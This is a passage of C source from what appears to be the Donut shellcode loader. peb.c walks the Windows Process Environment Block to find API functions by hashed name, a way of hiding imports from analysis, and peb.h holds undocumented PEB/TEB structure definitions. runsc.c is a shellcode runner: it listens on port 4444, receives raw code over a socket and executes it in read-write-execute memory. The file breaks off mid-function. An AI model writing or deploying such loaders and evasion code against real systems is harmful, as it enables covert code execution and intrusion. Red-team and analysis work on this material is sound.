loader/peb.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // locate address of API in export table using Maru hash function
32 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
33 PIMAGE_DOS_HEADER dos;
34 PIMAGE_NT_HEADERS nt;
35 DWORD i, j, cnt, rva;
36 PIMAGE_DATA_DIRECTORY dir;
37 PIMAGE_EXPORT_DIRECTORY exp;
38 PDWORD adr;
39 PDWORD sym;
40 PWORD ord;
41 PCHAR api, dll, p;
42 LPVOID addr=NULL;
43 ULONG64 dll_hash;
44 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
45
46 dos = (PIMAGE_DOS_HEADER)base;
47 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
48 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
49 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
50
51 // if no export table, return NULL
52 if (rva==0) return NULL;
53
54 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
55 cnt = exp->NumberOfNames;
56
57 // if no api names, return NULL
58 if (cnt==0) return NULL;
59
60 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
61 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
62 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
63 dll = RVA2VA(PCHAR, base, exp->Name);
64
65 // get hash of DLL string converted to lowercase
66 for(i=0;dll[i]!=0;i++) {
67 buf[i] = dll[i] | 0x20;
68 }
69 buf[i] = 0;
70 dll_hash = maru(buf, iv);
71
72 do {
73 // calculate hash of api string
74 api = RVA2VA(PCHAR, base, sym[cnt-1]);
75 // xor with DLL hash and compare with hash to find
76 if ((maru(api, iv) ^ dll_hash) == api_hash) {
77 // return address of function
78 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
79
80 // is this a forward reference?
81 if ((PBYTE)addr >= (PBYTE)exp &&
82 (PBYTE)addr < (PBYTE)exp +
83 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
84 {
85 DPRINT("%016llx is forwarded to %s",
86 api_hash, (char*)addr);
87
88 // copy DLL name to buffer
89 p=(char*)addr;
90
91 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
92 dll_name[i] = p[i];
93 if(p[i] == '.') break;
94 }
95
96 dll_name[i+1] = 'd';
97 dll_name[i+2] = 'l';
98 dll_name[i+3] = 'l';
99 dll_name[i+4] = 0;
100
101 p += i + 1;
102
103 // copy API name to buffer
104 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
105 api_name[i] = p[i];
106 }
107 api_name[i] = 0;
108
109 DPRINT("Trying to load %s", dll_name);
110 HMODULE hModule = inst->api.LoadLibrary(dll_name);
111
112 if(hModule != NULL) {
113 DPRINT("Calling GetProcAddress(%s)", api_name);
114 addr = inst->api.GetProcAddress(hModule, api_name);
115 } else addr = NULL;
116 }
117 return addr;
118 }
119 } while (--cnt && addr == NULL);
120
121 return addr;
122 }
123
124 // search all modules in the PEB for API
125 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
126 PPEB peb;
127 PPEB_LDR_DATA ldr;
128 PLDR_DATA_TABLE_ENTRY dte;
129 LPVOID addr = NULL;
130
131 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
132 ldr = (PPEB_LDR_DATA)peb->Ldr;
133
134 // for each DLL loaded
135 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
136 dte->DllBase != NULL && addr == NULL;
137 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
138 {
139 // search the export table for api
140 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
141 }
142 return addr;
143 }
+366
-0
loader/peb.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _STRING {
45 USHORT Length;
46 USHORT MaximumLength;
47 PCHAR Buffer;
48 } STRING, *PSTRING, ANSI_STRING, *PANSI_STRING;
49
50 typedef struct _RTL_USER_PROCESS_PARAMETERS {
51 BYTE Reserved1[16];
52 PVOID Reserved2[10];
53 UNICODE_STRING ImagePathName;
54 UNICODE_STRING CommandLine;
55 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
56
57 // PEB defined by rewolf
58 // http://blog.rewolf.pl/blog/?p=573
59 typedef struct _PEB_LDR_DATA {
60 ULONG Length;
61 BOOL Initialized;
62 LPVOID SsHandle;
63 LIST_ENTRY InLoadOrderModuleList;
64 LIST_ENTRY InMemoryOrderModuleList;
65 LIST_ENTRY InInitializationOrderModuleList;
66 } PEB_LDR_DATA, *PPEB_LDR_DATA;
67
68 typedef struct _LDR_DATA_TABLE_ENTRY
69 {
70 LIST_ENTRY InLoadOrderLinks;
71 LIST_ENTRY InMemoryOrderLinks;
72 LIST_ENTRY InInitializationOrderLinks;
73 LPVOID DllBase;
74 LPVOID EntryPoint;
75 ULONG SizeOfImage;
76 UNICODE_STRING FullDllName;
77 UNICODE_STRING BaseDllName;
78 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
79
80 typedef struct _PEB {
81 BYTE InheritedAddressSpace;
82 BYTE ReadImageFileExecOptions;
83 BYTE BeingDebugged;
84 BYTE _SYSTEM_DEPENDENT_01;
85
86 LPVOID Mutant;
87 LPVOID ImageBaseAddress;
88
89 PPEB_LDR_DATA Ldr;
90 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
91 LPVOID SubSystemData;
92 LPVOID ProcessHeap;
93 LPVOID FastPebLock;
94 LPVOID _SYSTEM_DEPENDENT_02;
95 LPVOID _SYSTEM_DEPENDENT_03;
96 LPVOID _SYSTEM_DEPENDENT_04;
97 union {
98 LPVOID KernelCallbackTable;
99 LPVOID UserSharedInfoPtr;
100 };
101 DWORD SystemReserved;
102 DWORD _SYSTEM_DEPENDENT_05;
103 LPVOID _SYSTEM_DEPENDENT_06;
104 LPVOID TlsExpansionCounter;
105 LPVOID TlsBitmap;
106 DWORD TlsBitmapBits[2];
107 LPVOID ReadOnlySharedMemoryBase;
108 LPVOID _SYSTEM_DEPENDENT_07;
109 LPVOID ReadOnlyStaticServerData;
110 LPVOID AnsiCodePageData;
111 LPVOID OemCodePageData;
112 LPVOID UnicodeCaseTableData;
113 DWORD NumberOfProcessors;
114 union
115 {
116 DWORD NtGlobalFlag;
117 LPVOID dummy02;
118 };
119 LARGE_INTEGER CriticalSectionTimeout;
120 LPVOID HeapSegmentReserve;
121 LPVOID HeapSegmentCommit;
122 LPVOID HeapDeCommitTotalFreeThreshold;
123 LPVOID HeapDeCommitFreeBlockThreshold;
124 DWORD NumberOfHeaps;
125 DWORD MaximumNumberOfHeaps;
126 LPVOID ProcessHeaps;
127 LPVOID GdiSharedHandleTable;
128 LPVOID ProcessStarterHelper;
129 LPVOID GdiDCAttributeList;
130 LPVOID LoaderLock;
131 DWORD OSMajorVersion;
132 DWORD OSMinorVersion;
133 WORD OSBuildNumber;
134 WORD OSCSDVersion;
135 DWORD OSPlatformId;
136 DWORD ImageSubsystem;
137 DWORD ImageSubsystemMajorVersion;
138 LPVOID ImageSubsystemMinorVersion;
139 union
140 {
141 LPVOID ImageProcessAffinityMask;
142 LPVOID ActiveProcessAffinityMask;
143 };
144 #ifdef _WIN64
145 LPVOID GdiHandleBuffer[64];
146 #else
147 LPVOID GdiHandleBuffer[32];
148 #endif
149 LPVOID PostProcessInitRoutine;
150 LPVOID TlsExpansionBitmap;
151 DWORD TlsExpansionBitmapBits[32];
152 LPVOID SessionId;
153 ULARGE_INTEGER AppCompatFlags;
154 ULARGE_INTEGER AppCompatFlagsUser;
155 LPVOID pShimData;
156 LPVOID AppCompatInfo;
157 PUNICODE_STRING CSDVersion;
158 LPVOID ActivationContextData;
159 LPVOID ProcessAssemblyStorageMap;
160 LPVOID SystemDefaultActivationContextData;
161 LPVOID SystemAssemblyStorageMap;
162 LPVOID MinimumStackCommit;
163 } PEB, *PPEB;
164
165
166 typedef struct _CLIENT_ID {
167 HANDLE UniqueProcess;
168 HANDLE UniqueThread;
169 } CLIENT_ID, *PCLIENT_ID;
170
171 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
172 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
173 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
174 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
175
176 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
177 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
178 PACTIVATION_CONTEXT *ActivationContext;
179 ULONG Flags;
180 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
181
182 typedef struct _ACTIVATION_CONTEXT_STACK
183 {
184 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
185 LIST_ENTRY FrameListCache;
186 ULONG Flags;
187 ULONG NextCookieSequenceNumber;
188 ULONG StackId;
189 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
190 #define GDI_BATCH_BUFFER_SIZE 310
191
192 typedef struct _GDI_TEB_BATCH
193 {
194 ULONG Offset;
195 ULONG_PTR HDC;
196 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
197 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
198
199 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
200 {
201 ULONG Flags;
202 PSTR FrameName;
203 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
204
205 typedef struct _TEB_ACTIVE_FRAME
206 {
207 ULONG Flags;
208 struct _TEB_ACTIVE_FRAME *Previous;
209 PTEB_ACTIVE_FRAME_CONTEXT Context;
210 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
211
212 #if !defined(_MSC_VER)
213 typedef struct _PROCESSOR_NUMBER {
214 USHORT Group;
215 UCHAR Number;
216 UCHAR Reserved;
217 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
218 #endif
219
220 typedef struct _TEB
221 {
222 NT_TIB NtTib;
223
224 PVOID EnvironmentPointer;
225 CLIENT_ID ClientId;
226 PVOID ActiveRpcHandle;
227 PVOID ThreadLocalStoragePointer;
228 PPEB ProcessEnvironmentBlock;
229
230 ULONG LastErrorValue;
231 ULONG CountOfOwnedCriticalSections;
232 PVOID CsrClientThread;
233 PVOID Win32ThreadInfo;
234 ULONG User32Reserved[26];
235 ULONG UserReserved[5];
236 PVOID WOW32Reserved;
237 LCID CurrentLocale;
238 ULONG FpSoftwareStatusRegister;
239 PVOID SystemReserved1[54];
240 NTSTATUS ExceptionCode;
241 PVOID ActivationContextStackPointer;
242 #ifdef _M_X64
243 UCHAR SpareBytes[24];
244 #else
245 UCHAR SpareBytes[36];
246 #endif
247 ULONG TxFsContext;
248
249 GDI_TEB_BATCH GdiTebBatch;
250 CLIENT_ID RealClientId;
251 HANDLE GdiCachedProcessHandle;
252 ULONG GdiClientPID;
253 ULONG GdiClientTID;
254 PVOID GdiThreadLocalInfo;
255 ULONG_PTR Win32ClientInfo[62];
256 PVOID glDispatchTable[233];
257 ULONG_PTR glReserved1[29];
258 PVOID glReserved2;
259 PVOID glSectionInfo;
260 PVOID glSection;
261 PVOID glTable;
262 PVOID glCurrentRC;
263 PVOID glContext;
264
265 NTSTATUS LastStatusValue;
266 UNICODE_STRING StaticUnicodeString;
267 WCHAR StaticUnicodeBuffer[261];
268
269 PVOID DeallocationStack;
270 PVOID TlsSlots[64];
271 LIST_ENTRY TlsLinks;
272
273 PVOID Vdm;
274 PVOID ReservedForNtRpc;
275 PVOID DbgSsReserved[2];
276
277 ULONG HardErrorMode;
278 #ifdef _M_X64
279 PVOID Instrumentation[11];
280 #else
281 PVOID Instrumentation[9];
282 #endif
283 GUID ActivityId;
284
285 PVOID SubProcessTag;
286 PVOID EtwLocalData;
287 PVOID EtwTraceData;
288 PVOID WinSockData;
289 ULONG GdiBatchCount;
290
291 union
292 {
293 PROCESSOR_NUMBER CurrentIdealProcessor;
294 ULONG IdealProcessorValue;
295 struct
296 {
297 UCHAR ReservedPad0;
298 UCHAR ReservedPad1;
299 UCHAR ReservedPad2;
300 UCHAR IdealProcessor;
301 };
302 };
303
304 ULONG GuaranteedStackBytes;
305 PVOID ReservedForPerf;
306 PVOID ReservedForOle;
307 ULONG WaitingOnLoaderLock;
308 PVOID SavedPriorityState;
309 ULONG_PTR SoftPatchPtr1;
310 PVOID ThreadPoolData;
311 PVOID *TlsExpansionSlots;
312 #ifdef _M_X64
313 PVOID DeallocationBStore;
314 PVOID BStoreLimit;
315 #endif
316 ULONG MuiGeneration;
317 ULONG IsImpersonating;
318 PVOID NlsCache;
319 PVOID pShimData;
320 ULONG HeapVirtualAffinity;
321 HANDLE CurrentTransactionHandle;
322 PTEB_ACTIVE_FRAME ActiveFrame;
323 PVOID FlsData;
324
325 PVOID PreferredLanguages;
326 PVOID UserPrefLanguages;
327 PVOID MergedPrefLanguages;
328 ULONG MuiImpersonation;
329
330 union
331 {
332 USHORT CrossTebFlags;
333 USHORT SpareCrossTebBits : 16;
334 };
335 union
336 {
337 USHORT SameTebFlags;
338 struct
339 {
340 USHORT SafeThunkCall : 1;
341 USHORT InDebugPrint : 1;
342 USHORT HasFiberData : 1;
343 USHORT SkipThreadAttach : 1;
344 USHORT WerInShipAssertCode : 1;
345 USHORT RanProcessInit : 1;
346 USHORT ClonedThread : 1;
347 USHORT SuppressDebugMsg : 1;
348 USHORT DisableUserStackWalk : 1;
349 USHORT RtlExceptionAttached : 1;
350 USHORT InitialThread : 1;
351 USHORT SessionAware : 1;
352 USHORT SpareSameTebBits : 4;
353 };
354 };
355
356 PVOID TxnScopeEnterCallback;
357 PVOID TxnScopeExitCallback;
358 PVOID TxnScopeContext;
359 ULONG LockCount;
360 ULONG SpareUlong0;
361 PVOID ResourceRetValue;
362 PVOID ReservedForWdf;
363 } TEB, *PTEB;
364
365 #endif
+737
-0
loader/runsc.c less more
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279
280 // execute
281 ((void(*)())bin)();
282
283 printf("OK!\n");
284
285 if (p->sim) {
286 #ifndef WIN
287 // close all descriptors
288 for (i=0; i<p->sim && p->sim<2048; i++) {
289 close(fd[i]);
290 }
291 #else
292 // todo
293 #endif
294 }
295 #ifdef WIN
296 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
297 #else
298 munmap (bin, p->code_len);
299 #endif
300 }
301 }
302
303 void send_data(args_t *p, int s) {
304 FILE *fd;
305 int outlen, len, opt;
306 uint32_t sum;
307 uint8_t buf[BUFSIZ];
308
309 // open file for read in binary mode
310 printf ("[ opening %s for read\n", p->file);
311 fd = fopen(p->file, "rb");
312
313 if (fd != NULL)
314 {
315 // send contents of file
316 printf ("[ sending data\n");
317 for (;;) {
318 // read block
319 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
320 // zero or less indicates EOF
321 if (outlen <= 0) break;
322 // send contents
323 for (sum=0; sum<outlen; sum += len) {
324 len=send (s, &buf[sum], outlen - sum, 0);
325 if (len <= 0) break;
326 }
327 p->code_len += sum;
328 if (outlen != sum) break;
329 }
330 printf ("[ sent %i bytes\n", p->code_len);
331 fclose(fd);
332 }
333 }
334
335 void recv_data(args_t *p, int s) {
336 int opt, r;
337 fd_set fds;
338 struct timeval tv;
339 void *pv;
340
341 p->code_len = 0;
342 p->code = malloc(BUFSIZ);
343
344 // set to non-blocking mode
345 #ifdef WIN
346 opt=1;
347 ioctlsocket (s, FIONBIO, (u_long*)&opt);
348 #else
349 opt=fcntl(s, F_GETFL, 0);
350 fcntl(s, F_SETFL, opt | O_NONBLOCK);
351 #endif
352 // keep reading until remote disconnects or we run out of memory
353 printf ("[ receiving data\n");
354
355 for (;;) {
356 FD_ZERO(&fds);
357 FD_SET(s, &fds);
358
359 tv.tv_sec = 5;
360 tv.tv_usec = 0;
361 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
362
363 if (r <= 0) {
364 printf ("[ waiting for data timed out or failed\n");
365 break;
366 }
367 // receive a block
368 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
369 if (r <= 0) break;
370 p->code_len += r;
371 // resize buffer
372 pv = realloc(p->code, p->code_len + BUFSIZ);
373 // on error, free pointer
374 if(pv == NULL) {
375 p->code_len = 0;
376 free(p->code);
377 p->code = NULL;
378 printf("[ error: out of memory.\n");
379 break;
380 }
381 p->code = pv;
382 }
383 if(p->code_len != 0) {
384 printf ("[ received %i bytes\n", p->code_len);
385 }
386 }
387
388 //
389 int ssr (args_t *p)
390 /**
391 * PURPOSE : send a shellcode or receive one from remote system and execute it
392 *
393 * RETURN : 0 or length of shellcode sent/received
394 *
395 * NOTES : None
396 *
397 *F*/
398 {
399 int s, opt, r, t;
400 fd_set fds;
401 struct timeval tv;
402
403 p->code_len=0;
404
405 // create socket
406 printf ("[ creating socket\n");
407 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
408 if (s < 0) return 0;
409
410 // ensure we can reuse socket
411 t=1;
412 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
413
414 // bind to port
415 printf ("[ binding to port %s\n", p->port);
416 r = bind(s, p->ai_addr, p->ai_addrlen);
417 if (r == 0) {
418 // listen
419 r = listen (s, 1);
420 if (r == 0) {
421 printf ("[ waiting for connections on %s\n", addr2ip(p));
422 if (r == 0) {
423 t = accept(s, p->ai_addr, &p->ai_addrlen);
424 printf ("[ accepting connection from %s\n", addr2ip(p));
425 if (t > 0) {
426 if (p->tx_mode == RSC_SEND) {
427 send_data(p, t);
428 } else {
429 recv_data(p, t);
430 xcode(p);
431 }
432 }
433 }
434 // close socket to peer
435 shutdown(t, SHUT_RDWR);
436 close(t);
437 } else {
438 perror("listen");
439 }
440 } else {
441 perror("bind");
442 }
443 // close listening socket
444 shutdown(s, SHUT_RDWR);
445 close(s);
446
